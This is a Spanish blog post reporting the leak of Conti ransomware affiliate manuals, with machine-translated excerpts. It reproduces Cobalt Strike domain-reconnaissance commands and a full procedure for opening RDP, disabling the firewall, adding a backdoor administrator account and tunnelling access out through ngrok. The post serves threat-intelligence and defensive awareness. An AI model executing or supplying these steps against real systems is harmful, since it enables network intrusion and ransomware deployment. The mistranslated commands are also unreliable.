Filtración de manuales: Rclone, AnyDesk,Cobalt Strike, Netscan, Metasploit, RDP Ngrok, Mimikatz, ZeroLogon, Kerberoasting, Pentest SQL, SQL DAMP, etc.

6 min readNov 1, 2021

Afiliado de ransomware descontento filtra los manuales técnicos del grupo Conti Ransom:

De acuerdo a la información de Therecord, se filtro las conversaciones de unos de las personas afiliados a este modelo RaaS (Ransomware as a Service), donde indica que reclutan penetration testers para probar Active Directory de las redes.

Fuente: TheRECORD

También se comparten capturas de pantalla de las direcciones IP que el grupo de atacantes de la familia Conti alojan servidores de Comando y Control de Cobalt Strike que los miembros afiliados de Conti utilizan para acceder a las redes de la empresa de las victimas.

Fuente: TheRECORD

De la primera captura se puede observar un 2do post el usuario m1Geelka, publica “Manuals and Software”:

Manuales y Software utilizados:

El afiliado del ransomware comparte un archivo que contiene manuales y software que usa este grupo de ransom #Conti:

El enlace en sendspace.com/file/qmgq3v a la fecha ya esta desactivado.Sin embargo en algunos foros el archivo esta filtrado, los manuales y software que usa este grupo, la mayoria de material esta en ruso, pero sí te permite entender algunas herramientas y procedimientos que les compartes a sus afiliados. Agradecer a Andres Morales por esta colaboración.

Directorio Principal:

Archivo: CobatlStrike Manual_V2 (en Ruso)

CobatlStrike Manual_V2 (Traducción a español):

1.Exploración inicial
1.1. Búsqueda de ingresos de la empresa

Encontrar el sitio web de la empresa
En Google: SITE + ingresos (mycorporation.com + ingresos)(“mycorporation.com” “ingresos”) — — — > Los atacantes tratan de averiguar que tan grande es la victima!!!
comprobar más de 1 sitio, si es posible(búho, manta, zoominfo, dnb, rocketrich) — — — -> Los atacantes les recomiendas a sus afiliados a buscar en otros buscadores sobre los ingresos de la victima

1.2. Definido por AB
1.3. shell whoami <===== quien soy yo
1.4. shell whoami / groups -> mis derechos sobre el bot (si el bot vino con un monik azul)
1.5.1. shell nltest / dclist: <===== controladores de dominio
net dclist <===== controladores de dominio
1.5.2. net domain_controllers <===== este comando mostrará las direcciones IP de los controladores de dominio
1.6. administradores de shell net localgroup <===== administradores locales
1.7. Shell net group / domain “Administradores de dominio” <===== administradores de dominio
1.8. shell net group “Administradores de empresa” / dominio <===== administradores de empresa

Directorio: Manuals

Manual: Ad_users.txt

Original en Ruso:

Traducción:

Archivo: Domains.txt

p.bat (24/07/2021):

Herramienta: Netscan

Original en Ruso:

Traducción:

Kerbet-attack, procedimiento:

Kerberoast.ps1
Author: Will Schroeder (@harmj0y)

Herramienta: Router Scan

Herramienta: Pentest SQL

Fuente: https://github.com/NetSPI/PowerUpSQL/wiki

Herramienta: RDP NGROK

En las otras herramientas observo RDP NGROK, el procedimiento esta en ruso, vamos intentar traducirlo y ver que trata de ejecutar, archivo original:

La traducción a español podría tener errores pero nos permite tener una idea general:

Inicio del manual “RDP NGROK.txt”:

-Regístrese en https://ngrok.com/
- Descarga ngrok.exe y cárgalo en la carretilla, en el menú del panel de la cuenta de ngrok, seleccione “Su token de autenticación”.
Copie el comando con el token (sin ./).
Por ejemplo:
ngrok authtoken 1vZgA1BbLWyhSjIE0f36QG6derd_5fXEPgPp8ZLxbUg
Entramos en la carretilla y escribimos:
shell ngrok authtoken 1vZgA1BbLWyhSjIE0f36QG6derd_5fXEPgPp8ZLxbUg
Lanzamos un túnel al puerto RDP:
shell ngrok tcp 3389
Abrimos el RDP en carretilla:
shell reg agregar “HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Control \ Terminal Server” / v fDenyTSConnections / t REG_DWORD / d 0 / f && reg agregar “HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Control \ Terminal Server” / v fAllowToGetHelp 1 / f

shell NetSh Advfirewall desactivó el estado de todos los perfiles //desactiva el fw, perfiles.

shell netsh advfirewall firewall set rule group = “escritorio remoto” nueva habilitación = Sí

shell netsh firewall set service type = remotedesktop mode = enable

6. Podemos agregar un usuario separado bajo ngrok: //agrega usuario Admin
shell net usuario Admin Password1 / add
Shell net localgroup Administradores Admin / agregar //grupo Administrdores

7. Vaya al panel de la cuenta ngrok — compruebe el túnel (“Puntos finales — Estado”).
Copie IP: puerto desde allí y vaya a cualquier cliente RDP. Nos conectamos (también puedes usar la cuenta que creamos).

Fuente: RDP NGROK.txt (Traducio a español, con errores de la traducción)

ngrok: Registro en la plataforma, descarga y ejecución: